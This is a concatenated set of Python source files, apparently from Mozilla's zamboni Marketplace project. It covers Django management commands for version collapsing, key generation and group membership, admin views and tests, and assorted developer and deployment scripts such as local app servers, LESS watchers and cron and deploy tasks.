raise CommandError('User is already in that group? %s' % e)
except UserProfile.DoesNotExist:
raise CommandError('User (%s) does not exist.' % user)
except Group.DoesNotExist:
raise CommandError('Group (%s) does not exist.' % group)
########NEW FILE########
__FILENAME__ = collapse_versions
import json
from django.core.management.base import BaseCommand
from django.db import connection, transaction
import amo
from addons.models import Webapp
from files.models import File
from versions.models import Version
class Command(BaseCommand):
help = 'Collapse versions for hosted apps'
def handle(self, *args, **kwargs):
do_collapsing()
def do_collapsing():
cursor = connection.cursor()
vkey = unicode(Version._meta)
fkey = 'files'
for app in (Webapp.objects.no_cache().filter(type=amo.ADDON_WEBAPP,
is_packaged=False)
.exclude(status=amo.STATUS_DELETED)
.no_transforms()):
with transaction.commit_on_success():
print 'Updating app [%s]' % app.id
try:
version = (Version.objects.filter(addon=app)
.no_transforms().latest())
except Version.DoesNotExist:
print 'App [%s] has no version? FIXME!' % app.id
continue
try:
file_ = File.objects.filter(version=version).latest()
except File.DoesNotExist:
file_ = None
old_versions = (app.versions.exclude(pk=version.id)
.no_transforms()
.order_by('-created'))
if not old_versions:
print 'No older versions found.'
continue
# Set the current_version to the one we're collapsing to. This
# avoids integrity errors as we delete versions below.
if app._current_version and app._current_version.id != version.id:
cursor.execute('''
UPDATE addons SET current_version=%s
WHERE id=%s''', (version.id, app.id,))
app._current_version = version
print 'Set current_version for app [%s] to [%s]' % (
app.id, version.id)
for old_version in old_versions:
# Hosted app reviews' version column is always NULL.
# `versioncomments` has no data for apps.
# `applications_versions` has no data for apps.
# VersionLogs and ActivityLogs
cursor.execute('''
SELECT t1.id, t1.version_id, t2.id, t2.arguments, t2.details
FROM log_activity_version_mkt AS t1
JOIN log_activity_mkt AS t2
ON t1.activity_log_id=t2.id
WHERE t1.version_id=%s''', (old_version.id,))
for row in cursor.fetchall():
(lav_id, lav_version_id,
la_id, la_arguments, la_details) = row
arguments = details = None
if la_arguments:
arguments = json.loads(la_arguments)
if la_details:
details = json.loads(la_details)
do_arguments_save = do_details_save = False
# arguments looks like:
# [{"webapps.webapp": 8}, {"versions.version": 8}]
for _a in arguments:
if vkey in _a:
_a[vkey] = version.id
do_arguments_save = True
# details looks like:
# {"files": [35], "reviewtype": "pending", "comments": "yo"}
if file_ and details and fkey in details:
details[fkey] = [file_.id]
do_details_save = True
if do_arguments_save or do_details_save:
new_a = json.dumps(arguments) if arguments else ''
new_d = json.dumps(details) if details else ''
cursor.execute('''
UPDATE log_activity_mkt
SET arguments=%s, details=%s
WHERE id=%s''', (new_a, new_d, la_id))
if do_arguments_save:
print 'Activity log [%s] arguments updated: %s' % (
la_id, new_a)
if do_details_save:
print 'Activity log [%s] details updated: %s' % (
la_id, new_d)
cursor.execute('''
UPDATE log_activity_version_mkt
SET version_id=%s
WHERE id=%s''', (version.id, lav_id))
print 'Version log [%s] version id updated: %s => %s' % (
lav_id, old_version.id, version.id)
# There are stale activity logs without the _mkt suffix that we
# need to deal with to avoid integrity errors when we delete
# the version.
cursor.execute('''
SELECT activity_log_id FROM log_activity_version
WHERE version_id=%s''', (old_version.id,))
for row in cursor.fetchall():
cursor.execute('''
DELETE FROM log_activity_app
WHERE activity_log_id=%s''', (row[0],))
cursor.execute('''
DELETE FROM log_activity_comment
WHERE activity_log_id=%s''', (row[0],))
cursor.execute('''
DELETE FROM log_activity_user
WHERE activity_log_id=%s''', (row[0],))
cursor.execute('''
DELETE FROM log_activity_version
WHERE activity_log_id=%s''', (row[0],))
cursor.execute(
'DELETE FROM log_activity WHERE id=%s', (row[0],))
# Copy over important fields if not set on current version.
if not version.releasenotes and old_version.releasenotes:
version.releasenotes = old_version.releasenotes
print 'Copied releasenotes (%s) from old_version [%s].' % (
version.releasenotes, old_version.id)
if not version.approvalnotes and old_version.approvalnotes:
version.approvalnotes = old_version.approvalnotes
print 'Copied approvalnotes (%s) from old_version [%s].' % (
version.approvalnotes, old_version.id)
if not version.reviewed and old_version.reviewed:
version.reviewed = old_version.reviewed
print 'Copied reviewed date (%s) from old version [%s].' % (
version.reviewed, old_version.id)
if (not version.has_editor_comment and
old_version.has_editor_comment):
version.has_editor_comment = old_version.has_editor_comment
print 'Copied editor_comment flag from old version [%s].' % (
old_version.id,)
if (not version.has_info_request and
old_version.has_info_request):
version.has_info_request = old_version.has_info_request
print 'Copied info_request flag from old version [%s].' % (
old_version.id,)
# Always take the oldest created stamp since we want to keep
# the first version's values.
if old_version.created < version.created:
version.created = old_version.created
# Delete this version's files and on-disk files.
cursor.execute('''
DELETE FROM files
WHERE version_id=%s''', (old_version.id,))
print 'Deleted files records attached to version [%s]' % (
old_version.id,)
old_files = File.objects.filter(version_id=old_version.id)
for f in old_files:
print 'Please remove file from file system: %s' % f.file_path
File.objects.invalidate(f)
# Delete the version itself.
cursor.execute('''
DELETE FROM versions
WHERE id=%s''', (old_version.id,))
Version.objects.invalidate(old_version)
print 'Deleted version [%s]' % old_version.id
# Save version to update any fields that were copied above.
version.save()
# Copy the file reviewed date if not set.
if (version.reviewed and not file_.reviewed and
file_.reviewed != version.reviewed):
file_.update(reviewed=version.reviewed)
# Call app.save to invalidate and re-index, etc.
if file_:
app.save()
########NEW FILE########
__FILENAME__ = genkey
import os
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from lib.crypto import generate_key
class Command(BaseCommand):
help = 'Generate a randomized encryption encryption key'
option_list = BaseCommand.option_list + (
make_option('--dest', action='store',
help='Location for key file. Default: %default',
default='./encryption.key'),
make_option('--length', action='store', type=int,
help='Number of random bytes. Actual key length will be '
'double, i.e. 32 yields a 64 byte key. '
'Default: %default',
default=32),
)
def handle(self, *args, **options):
if os.path.exists(options['dest']):
raise CommandError('Key file already exists at %s; remove it '
'first or specify a new path with --dest'
% options['dest'])
with open(options['dest'], 'wb') as fp:
fp.write(generate_key(options['length']))
os.chmod(options['dest'], 0600)
print 'Wrote cryptography key: %s' % options['dest']
########NEW FILE########
__FILENAME__ = removeuserfromgroup
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
from access.models import Group, GroupUser
from users.models import UserProfile
class Command(BaseCommand):
help = ('Remove a user from a group. Syntax: \n'
' ./manage.py removeuserfromgroup <userid> <groupid>')
log = commonware.log.getLogger('z.users')
def handle(self, *args, **options):
try:
do_removeuser(args[0], args[1])
msg = 'Removing %s from %s\n' % (args[0], args[1])
self.log.info(msg)
self.stdout.write(msg)
except IndexError:
raise CommandError(self.help)
def do_removeuser(user, group):
try:
if '@' in user:
user = UserProfile.objects.get(email=user)
elif user.isdigit():
user = UserProfile.objects.get(pk=user)
else:
raise CommandError('Unknown input for user.')
if group.isdigit():
group = Group.objects.get(pk=group)
else:
raise CommandError('Group must be a valid ID.')
# Doesn't actually check if the user was in the group or not.
GroupUser.objects.filter(user=user, group=group).delete()
except UserProfile.DoesNotExist:
raise CommandError('User (%s) does not exist.' % user)
except Group.DoesNotExist:
raise CommandError('Group (%s) does not exist.' % group)
########NEW FILE########
__FILENAME__ = models
########NEW FILE########
__FILENAME__ = test_commands
from nose.exc import SkipTest
import amo.tests
from apps.access.acl import action_allowed_user
from apps.users.models import UserProfile
from mkt.site.fixtures import fixture
from mkt.zadmin.management.commands.addusertogroup import do_adduser
from mkt.zadmin.management.commands.removeuserfromgroup import do_removeuser
class TestCommand(amo.tests.TestCase):
fixtures = fixture('group_admin', 'user_10482')
def test_group_management(self):
#TODO. I don't know how to override caching in tests --clouserw
raise SkipTest('Fails due to caching of groups.all()')
x = UserProfile.objects.get(pk=10482)
assert not action_allowed_user(x, 'Admin', '%')
do_adduser('10482', '1')
assert action_allowed_user(x, 'Admin', '%')
do_removeuser('10482', '1')
assert not action_allowed_user(x, 'Admin', '%')
########NEW FILE########
__FILENAME__ = test_views
from django.conf import settings
from django.core.urlresolvers import reverse
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from editors.models import RereviewQueue
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestHome(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.client.login(username='[email protected]', password='password')
def test_home(self):
# Test that the admin home page (which is AMO) can still be loaded
# from Marketplace without exceptions.
res = self.client.get(reverse('zadmin.index'))
eq_(res.status_code, 200)
class TestGenerateError(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.client.login(username='[email protected]', password='password')
heka = settings.HEKA
HEKA_CONF = {
'logger': 'zamboni',
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin',
{'override': True})},
'stream': {'class': 'heka.streams.DebugCaptureStream'},
'encoder': 'heka.encoders.NullEncoder',
}
from heka.config import client_from_dict_config
self.heka = client_from_dict_config(HEKA_CONF, heka)
self.heka.stream.msgs.clear()
def test_heka_statsd(self):
self.url = reverse('zadmin.generate-error')
self.client.post(self.url,
{'error': 'heka_statsd'})
eq_(len(self.heka.stream.msgs), 1)
msg = self.heka.stream.msgs[0]
eq_(msg.severity, 6)
eq_(msg.logger, 'zamboni')
eq_(msg.payload, '1')
eq_(msg.type, 'counter')
rate = [f for f in msg.fields if f.name == 'rate'][0]
name = [f for f in msg.fields if f.name == 'name'][0]
eq_(rate.value_double, [1.0])
eq_(name.value_string, ['z.zadmin'])
def test_heka_json(self):
self.url = reverse('zadmin.generate-error')
self.client.post(self.url,
{'error': 'heka_json'})
eq_(len(self.heka.stream.msgs), 1)
msg = self.heka.stream.msgs[0]
eq_(msg.type, 'heka_json')
eq_(msg.logger, 'zamboni')
foo = [f for f in msg.fields if f.name == 'foo'][0]
secret = [f for f in msg.fields if f.name == 'secret'][0]
eq_(foo.value_string, ['bar'])
eq_(secret.value_integer, [42])
def test_heka_cef(self):
self.url = reverse('zadmin.generate-error')
self.client.post(self.url,
{'error': 'heka_cef'})
eq_(len(self.heka.stream.msgs), 1)
msg = self.heka.stream.msgs[0]
eq_(msg.type, 'cef')
eq_(msg.logger, 'zamboni')
def test_heka_sentry(self):
self.url = reverse('zadmin.generate-error')
self.client.post(self.url,
{'error': 'heka_sentry'})
msgs = self.heka.stream.msgs
eq_(len(msgs), 1)
msg = msgs[0]
eq_(msg.type, 'sentry')
class TestAddonAdmin(amo.tests.TestCase):
fixtures = ['base/users', 'base/337141-steamcube', 'base/addon_3615']
def setUp(self):
self.login('[email protected]')
self.url = reverse('admin:addons_addon_changelist')
def test_no_webapps(self):
res = self.client.get(self.url, follow=True)
eq_(res.status_code, 200)
doc = pq(res.content)
rows = doc('#result_list tbody tr')
eq_(rows.length, 1)
eq_(rows.find('a').attr('href'), '/admin/models/addons/addon/337141/')
class TestManifestRevalidation(amo.tests.TestCase):
fixtures = fixture('webapp_337141') + ['base/users']
def setUp(self):
self.url = reverse('zadmin.manifest_revalidation')
def _test_revalidation(self):
current_count = RereviewQueue.objects.count()
response = self.client.post(self.url)
eq_(response.status_code, 200)
self.assertTrue('Manifest revalidation queued' in response.content)
eq_(len(RereviewQueue.objects.all()), current_count + 1)
def test_revalidation_by_reviewers(self):
# Sr Reviewers users should be able to use the feature.
user = UserProfile.objects.get(email='[email protected]')
self.grant_permission(user, 'ReviewerAdminTools:View')
assert self.client.login(username='[email protected]',
password='password')
self._test_revalidation()
def test_revalidation_by_admin(self):
# Admin users should be able to use the feature.
assert self.client.login(username='[email protected]',
password='password')
self._test_revalidation()
def test_unpriviliged_user(self):
# Unprivileged user should not be able to reach the feature.
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.post(self.url).status_code, 403)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns(
'',
url('^elastic$', views.elastic, name='zadmin.elastic'),
url('^manifest-revalidation$', views.manifest_revalidation,
name='zadmin.manifest_revalidation'),
)
########NEW FILE########
__FILENAME__ = views
from django.conf import settings
from django.db.models import Q
from django.shortcuts import render
import elasticutils
import amo
from amo.utils import chunked
from zadmin.decorators import admin_required
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import update_manifests
@admin_required(reviewers=True)
def manifest_revalidation(request):
if request.method == 'POST':
# Collect the apps to revalidate.
qs = Q(is_packaged=False, status=amo.STATUS_PUBLIC,
disabled_by_user=False)
webapp_pks = Webapp.objects.filter(qs).values_list('pk', flat=True)
for pks in chunked(webapp_pks, 100):
update_manifests.delay(list(pks), check_hash=False)
amo.messages.success(request, 'Manifest revalidation queued')
return render(request, 'zadmin/manifest.html')
@admin_required
def elastic(request):
es = elasticutils.get_es()
indexes = set(settings.ES_INDEXES.values())
es_mappings = es.get_mapping(None, indexes)
ctx = {
'aliases': es.aliases(),
'health': es.health(),
'state': es.cluster_state(),
'mappings': [(index, es_mappings.get(index, {})) for index in indexes],
}
return render(request, 'zadmin/elastic.html', ctx)
########NEW FILE########
__FILENAME__ = auth_google_analytics
#!/usr/bin/python
"""
This script is for setting up OAuth credentials for Google Analytics.
To use:
Visit https://code.google.com/apis/console/ and select "API Access".
If a client ID for an "installed application" hasn't been created, add one.
Click "Download JSON" in the box containing information about that client ID.
Run this script: 'python auth_google_analytics.py --secrets client_secrets.json'
(If you are running this on a host with no web browser, pass
--noauth_local_webserver as well.)
Paste the printed credentials into the Django settings file.
"""
import json
import pprint
import sys
import gflags
from oauth2client.client import flow_from_clientsecrets, Storage, EXPIRY_FORMAT
from oauth2client.tools import run
gflags.DEFINE_string('secrets', None, 'Client secret JSON filename', short_name='f')
gflags.FLAGS(sys.argv)
CLIENT_SECRETS = gflags.FLAGS.secrets
MISSING_CLIENT_SECRETS_MESSAGE = ("%s is missing or doesn't contain secrets "
"for a web application" % CLIENT_SECRETS)
FLOW = flow_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/analytics.readonly',
message=MISSING_CLIENT_SECRETS_MESSAGE)
s = Storage()
s.put = lambda *a, **kw: None
credentials = run(FLOW, s)
bits = dict([(str(name), str(getattr(credentials, name))) for name in
('access_token', 'client_id', 'client_secret',
'refresh_token', 'token_uri',
'user_agent')])
bits['token_expiry'] = credentials.token_expiry.strftime(EXPIRY_FORMAT)
print 'GOOGLE_ANALYTICS_CREDENTIALS = ',
pprint.pprint(bits)
########NEW FILE########
__FILENAME__ = checkdev
import json
import requests
import os
import time
GH_URL = 'https://api.github.com/repos/mozilla/zamboni/commits/master'
DEV_URL = 'https://marketplace-dev.allizom.org/media/git-rev.txt'
messaged = False
def alert(msg):
os.system('growlnotify --message "%s"' % msg)
alert('Watching -dev')
while True:
r = requests.get(GH_URL)
obj = json.loads(r.content)
git_sha = obj['sha'][:7]
r = requests.get(DEV_URL)
dev_sha = r.content.strip()
if git_sha == dev_sha:
msg = '-dev is up to date\n%s - %s' % (obj['commit']['author']['name'],
obj['commit']['message'])
alert(msg)
break
else:
if not messaged:
alert('-dev is behind master\n%s...%s' % (git_sha, dev_sha))
messaged = True
time.sleep(15)
########NEW FILE########
__FILENAME__ = gen-cron
#!/usr/bin/env python
import os
from optparse import OptionParser
TEMPLATE = open(os.path.join(os.path.dirname(__file__), 'crontab.tpl')).read()
def main():
parser = OptionParser()
parser.add_option("-z", "--zamboni",
help="Location of zamboni (required)")
parser.add_option("-u", "--user",
help=("Prefix cron with this user. "
"Only define for cron.d style crontabs"))
parser.add_option("-p", "--python", default="/usr/bin/python2.6",
help="Python interpreter to use")
parser.add_option("-d", "--deprecations", default=False,
help="Show deprecation warnings")
(opts, args) = parser.parse_args()
if not opts.zamboni:
parser.error("-z must be defined")
if not opts.deprecations:
opts.python += ' -W ignore::DeprecationWarning'
ctx = {'django': 'cd %s; %s manage.py' % (opts.zamboni, opts.python)}
ctx['z_cron'] = '%s cron' % ctx['django']
if opts.user:
for k, v in ctx.iteritems():
ctx[k] = '%s %s' % (opts.user, v)
# Needs to stay below the opts.user injection.
ctx['python'] = opts.python
print TEMPLATE % ctx
if __name__ == "__main__":
main()
########NEW FILE########
__FILENAME__ = css-add-line-breaks
#!/usr/bin/env/python
import os
import re
CSS_DIR = '../media/css'
REGEX = re.compile('({\n(?:\s+[\w-]+: .*?;\n)+)(.*?{)', re.MULTILINE)
def get_css_filenames():
filenames = []
for root, dirs, files in os.walk(CSS_DIR):
for f in files:
if f.endswith('.styl') or f.endswith('.less'):
filenames.append(os.path.join(root, f))
return filenames
def add_linebreak_css(filename):
f = open(filename, 'r+')
contents = f.read()
f.seek(0)
f.write(REGEX.sub(r'\1\n\2', contents))
f.truncate()
def run():
for filename in get_css_filenames():
add_linebreak_css(filename)
if __name__ == '__main__':
run()
########NEW FILE########
__FILENAME__ = run_locally
#!/usr/bin/env python
import os
if __name__ == '__main__':
cf = os.path.join(os.path.dirname(__file__), 'elasticsearch.yml')
cf = os.path.abspath(cf)
os.system('elasticsearch -f -D es.config=%s' % cf)
########NEW FILE########
__FILENAME__ = generate-mkt-cats
import amo
from addons.models import AddonCategory, Category, Webapp
def run():
"""
Usage::
python -B manage.py runscript scripts.generate-mkt-cats
"""
cats = {
'books-reference': 'Books & Reference',
'business': 'Business',
'education': 'Education',
'entertainment-sports': 'Entertainment & Sports',
'games': 'Games',
'health-fitness': 'Health & Fitness',
'lifestyle': 'Lifestyle',
'music': 'Music',
'news-weather': 'News & Weather',
'photos-media': 'Photos & Media',
'productivity': 'Productivity',
'shopping': 'Shopping',
'social': 'Social',
'travel': 'Travel',
'utilities': 'Utilities'
}
for slug, name in cats.iteritems():
cat, created = Category.objects.get_or_create(type=amo.ADDON_WEBAPP,
slug=slug)
if created:
cat.name = name
cat.save()
print 'Created "%s" category' % name
try:
w = Webapp.objects.visible()[0]
except IndexError:
pass
else:
ac, created = AddonCategory.objects.get_or_create(category=cat,
addon=w)
if created:
print 'Added "%s" to "%s" category' % (w.name, name)
w.save()
########NEW FILE########
__FILENAME__ = lesswatch
#!/usr/bin/env python
import os, time, sys, re
towatch = []
includes = {}
def say(s):
t = time.strftime('%X')
print '[%s] %s' % (t, s)
def render_list(files):
for f in files:
os.system('lessc %s %s.css' % (f, f))
if (f in includes):
say('re-compiling %d dependencies' % len(includes[f]))
render_list(includes[f])
say('re-compiled %d files' % len(files))
def watch():
say('watching %d files...' % len(towatch))
before = set([(f, os.stat(f).st_mtime) for f in towatch])
while 1:
after = set([(f, os.stat(f).st_mtime) for f in towatch])
changed = [f for (f, d) in before.difference(after)]
if len(changed):
render_list(changed)
before = after
time.sleep(.5)
for root, dirs, files in os.walk('./media'):
less = filter(lambda x: re.search('\.less$', x), files)
less = [(root + '/' + f) for f in less]
for f in less:
body = post_file = open(f, 'r').read()
m = re.search('@import \'([a-zA-Z0-9_-]+)\';', body)
if m:
k = root + '/' + m.group(1) + '.less'
if not k in includes:
includes[k] = []
includes[k].append(f)
if '.git' in dirs:
dirs.remove('.git')
towatch += less
watch()
########NEW FILE########
__FILENAME__ = check_wsgi
#!/usr/bin/python2.6
"""Makes sure mod_wsgi has been restarted after the last code push i.e,
mod_wsgi is fresher than the mtime on all *.py files in the application dir.
"""
from datetime import datetime
from optparse import OptionParser
import os
from subprocess import PIPE, Popen
import urllib2
def check_modwsgi(app_dir):
find_ = Popen("find %s -name '*.py'" % app_dir, stdout=PIPE, shell=True).communicate()[0]
py_files = find_.strip().split("\n")
newest_mtime = max((os.stat(f).st_mtime, f) for f in py_files)
req = urllib2.Request("http://localhost:81/z/services/loaded",
headers={'Host': 'addons.mozilla.org'})
mod_wsgi = datetime.strptime(urllib2.urlopen(req).read().strip(), '%Y-%m-%d %H:%M:%S.%f')
if mod_wsgi < datetime.fromtimestamp(newest_mtime[0]):
print "CRITICAL: %s is newer than modwsgi (restart apache)" % newest_mtime[1]
return 2
else:
print "OK: mod_wsgi is fresh"
return 0
if __name__ == "__main__":
parser = OptionParser()
parser.add_option('-d', '--app_dir',
help="directory of mod_wsgi app e.g., /data/amo_python/www/prod/zamboni")
options, args = parser.parse_args()
exit(check_modwsgi(options.app_dir))
########NEW FILE########
__FILENAME__ = serve_packaged_apps
#!/usr/bin/env python
"""
Script to serve packaged app mini-manifest and zip files to ease development.
Change directory to the root of your packaged app directory and execute this
script. For example:
$ cd ~/myapp
$ python ~/serve_packaged_apps.py
"""
import json
import logging
import optparse
import os
import re
import socket
from StringIO import StringIO
from sys import exc_info
from traceback import format_tb
from wsgiref import simple_server
from zipfile import ZipFile, ZIP_DEFLATED
DEFAULT_ADDR = '0.0.0.0'
DEFAULT_PORT = '8888'
ROOT = os.getcwd()
NAME = os.path.basename(ROOT)
log = logging.getLogger(__name__)
def _absolutify(path):
return '%s%s/%s' % (os.environ['BASE_URL'], NAME, path.rsplit('/', 1)[0])
def _get_local_ip():
"""A hack way to find the local IP without using any Python libraries."""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('google.com', 80))
ip = s.getsockname()[0]
s.close()
return ip
def index(environ, start_response):
template = '''
<!DOCTYPE html>
<html>
<head>
<title>{name} - Packaged App Server</title>
<style>
button {{
font-size: 18px;
padding: 5px;
width: 100%;
}}
</style>
</head>
<body>
<p><a href="{manifest}">{manifest}</a>: The mini-manifest is what
is provided to the <code>installPackage</code> API and provides
information about your app to Firefox OS.</p>
<p><a href="{package}">{package}</a>: The zipped-on-the-fly path to
your packaged app. The mini-manifest points to this URL inside the
mini-manifest.</p>
<button onclick="{install}('{manifest}');">Install</button>
</body>
</html>
'''
context = {
'name': NAME,
'install': 'navigator.mozApps.installPackage',
'manifest': _absolutify('manifest.webapp'),
'package': _absolutify('package.zip'),
}
start_response('200 OK', [('Content-Type', 'text/html')])
return [template.format(**context)]
def manifest(environ, start_response):
data = {
'name': u'My app',
'version': 1,
'size': 1000, # TODO
'package_path': _absolutify('package.zip'),
}
start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(data)]
def zip_file(environ, start_response):
def _add_file(f, name, path):
with open(path, 'r') as p:
f.writestr(name, p.read())
# Walk path, add all files to zip archive.
sio = StringIO()
with ZipFile(file=sio, mode='w', compression=ZIP_DEFLATED) as outfile:
for path, dirs, files in os.walk(ROOT):
for f in files:
full_path = os.path.join(path, f)
zip_path = full_path[len(ROOT) + 1:] # +1 for the slash.
_add_file(outfile, zip_path, full_path)
sio.seek(0)
start_response('200 OK', [('Content-Type', 'application/zip')])
return sio.getvalue()
# Routing URLs.
URLS = [
(r'^$', index), # Index points to these other URLs.
(r'manifest.webapp$', manifest), # The mini-manifest.
(r'package.zip$', zip_file), # The zipped package.
]
def application(environ, start_response):
path = environ.get('PATH_INFO', '').lstrip('/')
for regex, callback in URLS:
match = re.search(regex, path)
if match is not None:
environ['myapp.url_args'] = match.groups()
return callback(environ, start_response)
# If no URLs match, 404.
start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])
return ['Not Found']
class ExceptionMiddleware(object):
"""Exception middleware to catch errors and show a useful traceback."""
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
appiter = None
# Call the application sending the output back unchanged. Catch any
# exceptions that occur.
try:
appiter = self.app(environ, start_response)
for item in appiter:
yield item
# If an exception occours we get the exception information and prepare
# a traceback we can render.
except:
e_type, e_value, tb = exc_info()
traceback = ['Traceback (most recent call last):']
traceback += format_tb(tb)
traceback.append('%s: %s' % (e_type.__name__, e_value))
# We may or may have not started a response.
try:
start_response('500 INTERNAL SERVER ERROR', [('Content-Type',
'text/plain')])
except:
pass
yield '\n'.join(traceback)
if hasattr(appiter, 'close'):
appiter.close()
if __name__ == '__main__':
p = optparse.OptionParser(usage='%prog\n\n' + __doc__)
p.add_option('--addr',
default=DEFAULT_ADDR,
help='Address to serve at. Default: %s' % DEFAULT_ADDR)
p.add_option('--port',
default=DEFAULT_PORT,
help='Port to run server on. Default: %s' % DEFAULT_PORT,
type=int)
(options, args) = p.parse_args()
logging.basicConfig(level=logging.DEBUG,
format='[%(asctime)s] %(message)s')
ip = _get_local_ip() if options.addr == DEFAULT_ADDR else options.addr
base_url = 'http://%s:%s/' % (ip, options.port)
log.info('Serving at %s' % base_url)
os.environ['BASE_URL'] = base_url
application = ExceptionMiddleware(application)
server = simple_server.make_server(options.addr, options.port, application)
server.serve_forever()
########NEW FILE########
__FILENAME__ = serve_webapps
#!/usr/bin/env python
"""Serves .webapp/.json manifest files from the working directory."""
import logging
import optparse
import os
from wsgiref import simple_server
log = logging.getLogger(__name__)
document_root = os.getcwd()
def fileapp(environ, start_response):
path_info = environ['PATH_INFO']
if path_info.startswith('/'):
path_info = path_info[1:] # make relative
full_path = os.path.join(document_root, path_info)
content_type = 'text/html'
if full_path == '':
full_path = '.' # must be working dir
if path_info == "" or path_info.endswith('/') or os.path.isdir(full_path):
# directory listing:
out = ['<html><head></head><body><ul>']
for filename in os.listdir(full_path):
if filename.startswith('.'):
continue
if os.path.isdir(os.path.join(full_path, filename)):
filename = filename + '/'
out.append('<li><a href="%s">%s</a></li>' % (filename, filename))
out.append("</ul></body></html>")
body = "".join(out)
else:
f = open(full_path, 'r')
if full_path.endswith('.webapp') or full_path.endswith('.json'):
content_type = 'application/x-web-app-manifest+json'
body = f.read() # optimized for small files :)
start_response('200 OK', [('Content-Type', content_type),
('Content-Length', str(len(body)))])
return [body]
def main():
p = optparse.OptionParser(usage="%prog\n\n" + __doc__)
p.add_option("--addr", help="Address to serve at. Default: localhost",
default='')
p.add_option("--port", help="Port to run server on. Default: %default",
default=8090, type=int)
(options, args) = p.parse_args()
logging.basicConfig(level=logging.DEBUG,
format='[%(asctime)s] %(message)s')
log.info("starting webserver at http://%s:%s/"
% (options.addr or 'localhost', options.port))
httpd = simple_server.WSGIServer((options.addr, options.port),
simple_server.WSGIRequestHandler)
httpd.set_app(fileapp)
httpd.serve_forever()
if __name__ == '__main__':
main()
########NEW FILE########
__FILENAME__ = siege
"""
A script for generating siege files with a bunch of URL variations.
"""
import re
import sys
part_re = re.compile(r'\{([-\w]+)\}')
AMO_LANGUAGES = (
'af', 'ar', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa', 'fi',
'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sq', 'sr', 'sv-SE', 'uk', 'vi',
'zh-CN', 'zh-TW',
)
config = {
'base': [],
'locale': AMO_LANGUAGES,
'app': ['firefox'],
'extension-slug': [''] + """
alerts-and-updates appearance bookmarks download-management
feeds-news-blogging language-support photos-music-videos
privacy-security social-communication tabs toolbars web-development
other""".split(),
'theme-slug': [''] + """
animals compact large miscellaneous modern nature os-integration retro
sports""".split(),
'theme-sort': 'name updated created downloads rating'.split(),
'page': '1 2'.split(),
'exp': 'on off'.split(),
'personas-slug': [''] + """
abstract causes fashion firefox foxkeh holiday music nature other
scenery seasonal solid sports websites""".split(),
'personas-sort': """up-and-coming created popular rating""".split()
}
root = '{base}/{locale}/{app}'
templates = t = {
'root': '/',
'extensions': '/extensions/{extension-slug}/',
'language-tools': '/language-tools',
'themes': '/themes/{theme-slug}?sort={theme-sort}&page={page}',
'personas': '/personas/{personas-slug}',
}
t['themes-unreviewed'] = t['themes'] + '&unreviewed={exp}'
t['personas-sort'] = t['personas'] + '?sort={personas-sort}'
t['extensions-sort'] = t['extensions'] + '?sort={theme-sort}'
t['extensions-featured'] = t['extensions'] + 'featured'
for key, value in templates.items():
templates[key] = root + value
def combos(s, parts):
def _rec(s, parts, kw):
key, rest = parts[0], parts[1:]
rv = []
for opt in config[key]:
kw[key] = opt
if not rest:
rv.append(s.format(**kw))
else:
rv.extend(_rec(s, rest, kw))
return rv
return _rec(s, parts, {})
def gen(choices=templates):
rv = []
for template in choices:
parts = part_re.findall(template)
rv.extend(combos(template, parts))
return rv
def main():
args = sys.argv
try:
base, choices = sys.argv[1], args[2:] or templates.keys()
except IndexError:
print 'Usage: python siege.py <BASE> [%s]' % (', '.join(templates))
print '\nBASE should be something like "http://localhost:8000/z".'
print 'The remaining arguments are names of url templates.'
sys.exit(1)
config['base'] = [base.rstrip('/')]
print '\n'.join(gen(templates[k] for k in choices))
if __name__ == '__main__':
main()
########NEW FILE########
__FILENAME__ = update
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from commander.deploy import hostgroups, task
import commander_settings as settings
_src_dir = lambda *p: os.path.join(settings.SRC_DIR, *p)
VIRTUALENV = os.path.join(os.path.dirname(settings.SRC_DIR), 'venv')
@task
def create_virtualenv(ctx):
with ctx.lcd(settings.SRC_DIR):
status = ctx.local('git diff HEAD@{1} HEAD --name-only')
if 'requirements/' in status.out:
venv = VIRTUALENV
if not venv.startswith('/data'):
raise Exception('venv must start with /data')
ctx.local('rm -rf %s' % venv)
ctx.local('virtualenv --distribute --never-download %s' % venv)
ctx.local('%s/bin/pip install --exists-action=w --no-deps --no-index '
'--download-cache=/tmp/pip-cache -f %s '
'-r %s/requirements/prod.txt' %
(venv, settings.PYREPO, settings.SRC_DIR))
if getattr(settings, 'LOAD_TESTING', False):
ctx.local('%s/bin/pip install --exists-action=w --no-deps '
'--no-index --download-cache=/tmp/pip-cache -f %s '
'-r %s/requirements/load.txt' %
(venv, settings.PYREPO, settings.SRC_DIR))
# make sure this always runs
ctx.local("rm -f %s/lib/python2.6/no-global-site-packages.txt" % venv)
ctx.local("%s/bin/python /usr/bin/virtualenv --relocatable %s" %
(venv, venv))
@task
def update_locales(ctx):
with ctx.lcd(_src_dir("locale")):
ctx.local("svn revert -R .")
ctx.local("svn up")
ctx.local("./compile-mo.sh .")
@task
def loadtest(ctx, repo=''):
if hasattr(settings, 'MARTEAU'):
os.environ['MACAUTH_USER'] = settings.MARTEAU_USER
os.environ['MACAUTH_SECRET'] = settings.MARTEAU_SECRET
ctx.local('%s %s --server %s' % (settings.MARTEAU, repo,
settings.MARTEAU_SERVER))
@task
def update_products(ctx):
with ctx.lcd(settings.SRC_DIR):
ctx.local('%s manage.py update_product_details' % settings.PYTHON)
@task
